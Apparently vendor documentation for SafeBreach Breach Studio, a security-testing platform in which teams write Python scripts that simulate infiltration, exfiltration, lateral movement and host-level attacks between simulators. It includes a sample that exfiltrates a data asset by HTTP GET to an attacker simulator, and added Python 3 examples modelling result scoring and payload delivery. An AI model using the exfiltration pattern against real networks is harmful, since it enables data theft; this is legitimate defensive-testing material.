Breach Studio Guide


Table of Contents
Breach Studio - Overview
    Who can Benefit
    Supported Types of Custom Breach Methods
    Prerequisites and Limitations
    Risks
    Understanding Attack Phases
        Infiltration
        Exfiltration
        Lateral Movement
        Host Level
    Managing Custom Breach Methods
        Create a Custom Breach Method
        Test the Custom Breach Method
        Edit the Custom Breach Method
        Publish to the Playbook
        Run the Custom Content
    How SafeBreach Calculates the Simulation Result
        For Network Simulations
        For Host Simulations
Creating Python Custom Breach Methods
    Python Custom Breach Method Parameters
    Writing Python Scripts for Custom Breach Methods
        The SafeBreach Framework API: Functions and Parameters
        Python Limitations and Supported Python Libraries

Breach Studio - Overview


Breach Studio allows customers to get additional value from the SafeBreach platform by creating custom
content, testing it and extending the Playbook. Custom breach methods may be run automatically and
continuously.

NOTE
Breach Studio is supported as of version 2019Q2.3

Who can Benefit


The Breach Studio is for:

• Red Teams - Leverage SafeBreach as an automation platform for running custom breach methods.
• Blue / Purple Teams - Extend the Playbook with customer-specific custom breach methods to validate
their security controls.

Supported Types of Custom Breach Methods


Currently, only Python-based custom breach methods are supported. Users can write any code, subject to the
limitations and risks described below.

In SafeBreach, breach methods are categorized into one of four attack phases (see Understanding Attack
Phases). Every custom breach method is assigned an attack phase, which determines how the custom content
is represented in and handled by the system.

Prerequisites and Limitations


The following are known limitations for creating custom breach methods:

• For network breach methods, at least two simulators are required to run the simulation. For host level
breach methods, one is sufficient.
• For infiltration breach methods, at least one simulator must have the Infiltration Simulator role as-
signed to it.
• For lateral movement breach methods, the two simulators must not have the role of Infiltration or
Exfiltration Simulator assigned.
• For exfiltration breach methods, at least one simulator with data assets is required.
• When using operating system constraints, make sure that the selected simulators have the required
operating systems.
• The duration of a custom breach method simulation is limited to 30 seconds for network breach meth-
ods and 5 minutes for host level breach methods. If the duration exceeds the timeout period, the simu-
lation is considered "blocked."

NOTE
Simulator roles are configured in Settings. For more information, see Fine-tuning the
simulator role and other settings.

Risks
SafeBreach does not review or validate custom breach methods for risky behavior. A custom breach method
may perform actions that damage components involved in the simulation or other entities in the customer's
network. Use of Breach Studio is entirely at the customer's discretion and risk. For more information,
review the SafeBreach terms and conditions.

NOTE
SafeBreach recommends testing custom breach methods on non-production simulators
first, to minimize risk during the development cycle.

Understanding Attack Phases


SafeBreach Research Lab creates the playbook of breach methods to test enterprise networks against
threats to security. Red teams and other security professionals can use SafeBreach to author their own
custom breach methods.

Here are the four categories of breach methods, based on the different attack phases:

• Infiltration: The attacker is an external simulator that tries to attack the internal target simulator.
• Exfiltration: The attacker is an external or other simulator that tries to receive data leaked from the
internal target simulator.
• Lateral Movement: The attacker is an internal simulator that tries to attack the target simulator within
the network.
• Host Level: Malicious host-level actions are simulated on the target simulator (endpoint).

For more information, see How Breach Methods are Categorized.

Infiltration
Simulating an infiltration attack involves a breach method with two simulators. The attacker is an exter-
nal simulator that tries to attack the internal target simulator.

Examples
Sample attack types that users can create are: URL Navigation, Malicious Domain Resolution, Server
Communication, Brute Force, Denial of Service, Remote Command Execution, Remote Server Exploita-
tion, Malicious Payload Transfer, and more.

Prerequisites
For running an infiltration breach method, the following settings are required:

• An infiltration simulator that plays the role of the attacker. Use Settings to define a simulator as an
infiltration simulator.
• A simulator within the segment that is being tested, that plays the role of the target.

Plans that Include Infiltration Breach Methods
All methods, Infiltration

Exfiltration
Simulating an exfiltration attack involves a breach method with two simulators. The attacker is an
external or other simulator that receives data leaked from the internal target simulator. Leakage of
different data assets can be simulated over various protocols, using multiple techniques that exploit
components of those protocols.

Examples
Exfiltration via FTP STOR (Binary), Data assets exfiltration over BOOTP, and Data Exfiltration via DNS
Tunneling

Prerequisites
For running an exfiltration method, the following settings are required:

• An exfiltration simulator that plays the role of the attacker, for scenarios involving exfiltration out
of the network, and / or another simulator in the network, to simulate exfiltration from one computer in
the network to another. Use Settings to define a simulator as an exfiltration simulator.
• A simulator with data assets within the segment that is being tested, that plays the role of the target.

Plans that Include Exfiltration Breach Methods
All methods, Exfiltration

Lateral Movement
Lateral movement simulated attacks move through a network in search of data assets. They may also
attempt other forms of damage.

Examples
Sample attack types that users can create include: Brute Force, Denial of Service, Remote Command Exe-
cution, Remote Server Exploitation, Malicious Payload Transfer, and more.

Prerequisites
Two simulators are required. Neither may have an infiltration or exfiltration role.

Plans that Include Lateral Movement Breach Methods
All methods, Lateral Movement

Host Level
Host level breach methods simulate gaining access to, altering, or copying data.

Examples
Sample attack types that users can create include: Drop of Malicious Payload to Disk, Data Collection,
Script Execution, OS Configuration Change, File System Manipulation, and more. Note that impersona-
ted users can only be used in host-level breach methods.

Prerequisites
One simulator is required. It must not have an infiltration or exfiltration role.

Plans that Include Host Level Breach Methods
All methods, Host-level

Managing Custom Breach Methods


Breach Studio allows users to manage custom breach methods with the following steps:

1. Create - Define the details and all required parameters
2. Test - Run and validate the custom breach method on selected simulators
3. Edit - View, update, and delete the custom content
4. Publish - Extend the Playbook by publishing the custom breach method
5. Run - Simulate published custom content

Create a Custom Breach Method


1. Select the type of custom breach method to create, for example, Create from Python.

2. Fill in the form with details and parameters.

See Python Custom Breach Method Parameters for the parameters required for creating a Python
custom breach method.
3. Once the parameters have been filled in correctly, click Save as Draft.

Test the Custom Breach Method


1. Run a test for all simulators or select which simulators to use.

2. Change the selected simulators and, if desired, rename the test and then either click:
• Run now - Sends the test to the front of the queue to be run immediately
• Add to queue - Sends the test to the end of the queue to be run after the other tests in the queue
are run

3. View the test results

NOTE
These results only appear in the Breach Studio.

4. Drill down on a single result to view the STDOUT and STDERR for the simulator(s).

5. If required, correct the Python code and upload it again.

Edit the Custom Breach Method


• To view a custom breach method, click Open Recent or select from the left pane lists.

• To update the custom breach method parameters, select it, edit the applicable fields, and save.

NOTE
You can save a draft method as a draft or publish it to the Playbook. Breach methods
that have already been published may only be saved as published breach methods.

• After selecting a custom breach method, you can delete it by clicking the delete icon.

Publish to the Playbook


Once you have carefully tested the breach method, Publish it to include it in the Playbook.

NOTE
Published custom breach methods behave the same way as prepackaged breach methods:
they can be run from the Playbook, they are automatically included in Plans based on
their attack phase and custom attack type, and they can be included in custom plans
(for instructions, see Planning and Managing Playbook Methods for Simulations).

Run the Custom Content


You can find all the custom breach methods using the Attack Type: Custom filter on the following pages:

• Planning
• Playbook
• Simulation Results

How SafeBreach Calculates the Simulation Result


SafeBreach determines whether a simulation is blocked or not-blocked using different criteria for
network and host simulations.

For Network Simulations


A simulation is considered not-blocked in one of the following cases:

• When the simulation involves a transfer of a payload, the attacker and target simulators each report
the hash of the payload they sent or received, as the final action of the simulation, to SafeBreach
Management. If the hashes match, the simulation is not-blocked.

Sample of the target simulator code for actions at the end of the simulation:

    # Sends an innocent HTTP GET request to the provided URL.
    # The response will contain a malicious file.
    # The content of the response is accessible via state['DATA'].
    http_get(state, url)
    return state['DATA']

Sample of the attacker simulator code for actions at the end of the simulation:

    import base64

    # Base64-encoded content of the EICAR anti-virus test file.
    BUFFER = 'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNUL
    ...
    return base64.b64decode(BUFFER)

• For other types of network simulations, the simulation is considered not-blocked when it finishes
successfully, without any exceptions, and both simulators report True as a return value.

    return True

For Host Simulations


For host simulations, the result is considered not-blocked when it finishes successfully, without any ex-
ceptions.
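The rules above are applied on SafeBreach Management, not inside your script, but seeing them as code helps when deciding what each side should return. The following is an added example, not SafeBreach code: it models the documented rules locally in Python 3 so you can dry-run attacker / target outcomes offline. The hash algorithm (SHA-256), the ScriptRun record and the sample runs are assumptions made for this example; the guide does not name a hash.

```python
"""Local model of the blocked / not-blocked rules from the guide.

Added example, not SafeBreach code. The platform applies these rules on
SafeBreach Management; this stand-in only helps reason about what the
attacker and target scripts must return. SHA-256 is an assumption.
"""
import hashlib

NETWORK_TIMEOUT = 30      # seconds, network breach methods (from the guide)
HOST_TIMEOUT = 5 * 60     # seconds, host-level breach methods (from the guide)


class ScriptRun(object):
    """Outcome of one simulator's main(): return value, exception, duration."""
    def __init__(self, returned=None, exception=None, seconds=0.0):
        self.returned = returned
        self.exception = exception
        self.seconds = seconds


def payload_hash(data):
    """Fingerprint of a payload; both sides hash what they sent / received."""
    if isinstance(data, str):
        data = data.encode()
    return hashlib.sha256(data).hexdigest()


def evaluate(phase, attacker=None, target=None, payload_transfer=False):
    """Return 'blocked' or 'not-blocked' following the guide's rules.

    phase: 'infiltration' | 'exfiltration' | 'lateral_movement' | 'host'
    """
    if phase == 'host':
        # One simulator; not-blocked iff it finished without exceptions in time.
        if target.exception is not None or target.seconds > HOST_TIMEOUT:
            return 'blocked'
        return 'not-blocked'

    # Network phases involve two simulators, both bound by the 30 s limit.
    for run in (attacker, target):
        if run.exception is not None or run.seconds > NETWORK_TIMEOUT:
            return 'blocked'

    if payload_transfer:
        # Both sides return the payload; management compares the hashes.
        if attacker.returned is None or target.returned is None:
            return 'blocked'
        same = payload_hash(attacker.returned) == payload_hash(target.returned)
        return 'not-blocked' if same else 'blocked'

    # Other network methods: both scripts must return True.
    if attacker.returned is True and target.returned is True:
        return 'not-blocked'
    return 'blocked'


# Constructed sample payload: the 68-byte EICAR anti-virus test string, the
# same content the guide's attacker sample returns after base64-decoding.
EICAR = b'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'


def demo():
    """Four constructed runs showing how each rule decides the result."""
    # 1. Payload arrived intact: no control stopped it -> not-blocked.
    intact = evaluate('infiltration',
                      attacker=ScriptRun(returned=EICAR, seconds=1.2),
                      target=ScriptRun(returned=EICAR, seconds=1.4),
                      payload_transfer=True)
    # 2. An inline control truncated the body: hashes differ -> blocked.
    rewritten = evaluate('infiltration',
                         attacker=ScriptRun(returned=EICAR, seconds=1.2),
                         target=ScriptRun(returned=EICAR[:20], seconds=1.4),
                         payload_transfer=True)
    # 3. Target exceeded the 30 s network timeout (connection silently dropped).
    timed_out = evaluate('lateral_movement',
                         attacker=ScriptRun(returned=True, seconds=2.0),
                         target=ScriptRun(returned=True, seconds=31.0))
    # 4. Host method raised because the dropped file was deleted by EDR.
    host = evaluate('host', target=ScriptRun(exception=IOError('deleted')))
    return intact, rewritten, timed_out, host


if __name__ == '__main__':
    print(demo())
```

Note that case 3 shows why a long-running network check is a poor design: a silently dropped connection is indistinguishable from a timeout, so set explicit socket timeouts well under 30 seconds and let the script fail fast instead.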

Creating Python Custom Breach Methods

Python Custom Breach Method Parameters


Once you select Create from Python, a form opens. Fill in the form and then save it. For an overview of
the process, see Managing Custom Breach Methods.

Parameters

• Name - The breach method name, for example, "Malicious File Downloaded using an HTTP GET Request".
• Description - Typically, the description includes the following information:
    Goal - What is this simulation trying to verify?
    Actions - What does the simulation do in order to achieve the goal?
    Expected behavior - How should the security mechanisms work in order to protect against this
    breach method?
    More Info - Other information that may be useful in understanding the breach method.
• Attack Phase - Select the attack phase of the breach method. See Understanding Attack Phases for an
explanation of the infiltration, exfiltration, lateral movement, and host-level attack phases.
• Attack Type - The default attack type is Custom. It is not editable.
• Impersonated users - Toggle the switch to enable or disable the use of impersonated users with this
custom breach method. For instructions, see Setting Up Impersonated Users for Simulating Breach Methods.
• Attacker OS - Specify the attacker OS constraint so the custom breach method will only use simulators
having this operating system. The options are: Any OS, Windows, Linux, macOS.
• Target OS - Specify the target OS constraint so the custom breach method will only use simulators
having this operating system. The options are: Any OS, Windows, Linux, macOS.

Attacker Code Upload the Python script file that will be executed on the attacker simulator.

NOTE
See Using Python Scripts for Custom Breach Methods for more
on preparing the Python script.

Target Code Upload the Python script file that will be executed on the target simulator.

NOTE
See Using Python Scripts for Custom Breach Methods for more
on preparing the Python script.

NOTE
Sample Python scripts are available for download from SafeBreach.

Host Level breach methods only involve one simulator which plays the role of the tar-
get.

Infiltration, Exfiltration, and Lateral Movement breach methods involve two simulators.

Writing Python Scripts for Custom Breach Methods


You can write a Python script for a custom breach method using the supported Python libraries (see
Python Limitations and Supported Python Libraries) as well as the SafeBreach Framework API functions.

The SafeBreach Framework API: Functions and Parameters


The Main Function
Each Python script must include the main function with SafeBreach supported parameters in the func-
tion signature.

Signature

main(system_data, asset, proxy, *args, **kwargs)


This is the main function of the simulation. Only the code written inside this function will be executed
during the simulation.

The Parameters

system_data
The system_data parameter is a dictionary that contains the IP addresses of the simulators running the
current breach method, at runtime. The following IP addresses are available:

• system_data['target_external_ip'] - The IP of the target simulator as observed by SafeBreach Management
• system_data['target_internal_ip'] - The IP of the target simulator as reported by the target simulator
to SafeBreach Management
• system_data['attacker_external_ip'] - The IP of the attacker simulator as observed by SafeBreach
Management
• system_data['attacker_internal_ip'] - The IP of the attacker simulator as reported by the attacker
simulator to SafeBreach Management

asset
When simulating exfiltration breach methods, the asset parameter will contain the data asset to exfil-
trate.

NOTE
The asset parameter is only relevant for Exfiltration attack phase breach methods.

Sample Usage

    # SafeBreach modules.
    from framework import SafeBreachData
    from framework.red.http import http_get

    # Port the attacker script listens on (assumption made for this sample).
    PORT = 8080

    def main(system_data, asset, proxy, *args, **kwargs):
        # Wraps the asset in the state object that framework modules read and update.
        state = SafeBreachData(asset)

        # The attacker simulator is addressed by its internal IP (assumption for
        # this sample; use the address that is routable in your deployment).
        attacker_hostname = system_data['attacker_internal_ip']
        url = 'http://%s:%s/' % (attacker_hostname, PORT)

        # Exfiltrates the asset using an HTTP GET request to the provided URL.
        print "Exfiltrating asset to %s:%s" % (attacker_hostname, PORT)
        http_get(state, url)

        # Returns the sent asset for comparison with the received asset.
        # This comparison determines the result of the simulation.
        return asset

proxy

NOTE
The proxy parameter is only relevant for network simulations, including infiltration,
exfiltration, and lateral movement breach methods.

The proxy parameter is a dictionary that contains the proxy information required for running simula-
tions with proxies, including:

• proxy['host'] - The host name or IP address of the proxy


• proxy['protocol'] - The protocol used to connect to the proxy
• proxy['port'] - The port used to connect to the proxy
• proxy['username'] - The username used to authenticate to the proxy
• proxy['password'] - The password used to authenticate to the proxy

Proxies are defined in the Settings screen. For more information about setting up a proxy server, see
Setting up the Proxy Servers for Simulating Breaches.

When a breach method is defined with a proxy, the proxy details from Settings are passed in the proxy
parameter; use them in your custom breach method.

Note that the breach method is always run both with and without proxy details, so the value of proxy may
be None. The script must handle that case.

Sample Usage

    # SafeBreach modules.
    from framework import SafeBreachData
    from framework.proxies import add_proxy
    from framework.red.http import http_get

    def main(system_data, asset, proxy, *args, **kwargs):
        state = SafeBreachData(asset)

        # Adds the proxy information to state. All subsequent network operations
        # consider this value before initiating communication. The method also
        # runs without a proxy; then proxy is None and nothing is added.
        if proxy is not None:
            add_proxy(state, proxy)

        # Exfiltrates the asset using an HTTP GET request to the provided URL
        # (url is chosen by the author of the breach method).
        http_get(state, url)
        return asset

SafeBreach Special Objects

SafeBreachData
A dictionary that saves the state and is used mainly by the system

ServiceStarter
An auxiliary class that provides the capability of starting a Windows service by name

Helper Functions

Sync Mechanism
Sometimes the attacker and target scripts must be synchronized, for example so that one side waits for
a network request or response from the other and only then continues execution. Use the following
functions for this.

framework.wait()
The framework.wait() sync mechanism is a blocking function that suspends the simulation until the
framework.ready event is received from the other simulator.

framework.ready()
The framework.ready() sync mechanism sends the framework.ready event to the other simulator
notifying that the simulation can proceed.
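The usual reason for the rendezvous is that the target must have its listener open before the attacker sends anything; otherwise the attacker's connection is refused and the simulation is wrongly reported as blocked. The following is an added example, not SafeBreach code and not the framework API: it models the pattern in Python 3 with two threads on localhost. A Sync class stands in for framework.wait() / framework.ready(), the target opens its socket and only then signals ready, and the attacker waits before connecting. The port, the payload, the system_data values and the proxy handling are constructed for this example.

```python
"""Attacker / target rendezvous modelled locally.

Added example, not SafeBreach code. Sync replaces framework.wait() and
framework.ready(); target_main and attacker_main stand in for the two
uploaded scripts and run as threads on 127.0.0.1.
"""
import socket
import threading

PAYLOAD = b'constructed-malicious-payload'   # constructed stand-in payload
PORT = 18081                                 # assumption: listener port


class Sync(object):
    """One-shot event standing in for framework.wait() / framework.ready()."""
    def __init__(self):
        self._event = threading.Event()

    def ready(self):
        # Tell the other simulator it may proceed.
        self._event.set()

    def wait(self, timeout=5):
        # Block until the other side signalled ready; False on timeout.
        return self._event.wait(timeout)


def target_main(system_data, asset, proxy, sync):
    """Target script: open the listener first, then signal the attacker."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((system_data['target_internal_ip'], PORT))
    srv.listen(1)
    srv.settimeout(5)                    # fail fast, well under the 30 s limit
    sync.ready()                         # only now may the attacker connect
    try:
        conn, _ = srv.accept()
        with conn:
            received = b''
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                received += chunk
    finally:
        srv.close()
    return received                      # management would hash this


def attacker_main(system_data, asset, proxy, sync):
    """Attacker script: wait for the target, then deliver the payload."""
    if not sync.wait():
        raise RuntimeError('target never became ready')   # -> blocked
    dest = (system_data['target_internal_ip'], PORT)
    # The method also runs without a proxy, so proxy may be None.
    if proxy is not None:
        dest = (proxy['host'], int(proxy['port']))        # route via proxy
    with socket.create_connection(dest, timeout=5) as s:
        s.sendall(PAYLOAD)
    return PAYLOAD                       # management would hash this


def run_simulation(proxy=None):
    """Run both scripts as a network breach method would; return their results."""
    system_data = {'target_internal_ip': '127.0.0.1',     # constructed values
                   'attacker_internal_ip': '127.0.0.1'}
    sync = Sync()
    results = {}

    def runner(name, fn):
        results[name] = fn(system_data, None, proxy, sync)

    threads = [threading.Thread(target=runner, args=('target', target_main)),
               threading.Thread(target=runner, args=('attacker', attacker_main))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


if __name__ == '__main__':
    r = run_simulation()
    print('not-blocked' if r['attacker'] == r['target'] else 'blocked')
```

On the real platform the same shape applies: the target script calls framework.ready() after its listener is bound, the attacker script calls framework.wait() before sending, and both return the payload so that the hashes can be compared.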

Other Functions
The following components can be used in Python scripts.

http_get(state, url)
Performs an HTTP GET request.

Import

from framework.red.http import http_get

Parameters

• state – special safebreach state object


• url – destination url for the http request

open_or_die(state, file_path)
Checks whether a file can be opened for reading. Usually used to check for malicious files on a disk when
AV software is installed that would delete the file.

Import

from framework.endpoint.windows.safe_actions.actions.verify_file import open_or_die

Parameters

• state – special safebreach state object


• file_path– the path to the file to check

add_proxy(state, proxy)
Adds proxy information to state. All subsequent network operations consider the proxy information
before initiating communication.

Import

from framework.proxies import add_proxy

Parameters

• state - special safebreach state object


• proxy - the proxy object from the Main function arguments

Python Limitations and Supported Python Libraries


This section lists the current known limitations and the third-party libraries supported for creating
custom breach methods.

Python Limitations and Important Information


The following limitations and important information apply to Python scripts.

• Every script is executed as a separate process, as root / SYSTEM or as an impersonated user (when
defined in the system). For more information, see Setting Up Impersonated Users for Simulating Breach
Methods.
• Python scripts run in the Python virtual environment. They can only use Python standard and other
supported libraries (see below).
• A python script runs as part of a single breach method with a single set of parameters, for example,
one specific port or protocol. If multiple variations are required, create a separate breach method with
its corresponding python script for each variation.
• Each Python script file is limited to 10MB.

Supported Python Libraries


The following third-party libraries (pinned versions) are supported for creating custom breach methods.

requests==2.9.1
dnslib==0.9.3
fake-factory==0.4.0
impacket==0.9.15
ipaddress==1.0.19
netaddr==0.7.18
netifaces==0.10.6
networkx==1.11
psutil==3.3.0
pycurl==7.43.0
pyOpenSSL==17.5.0
pysnmp==4.2.5
PySocks==1.6.8
tftpy==0.6.2
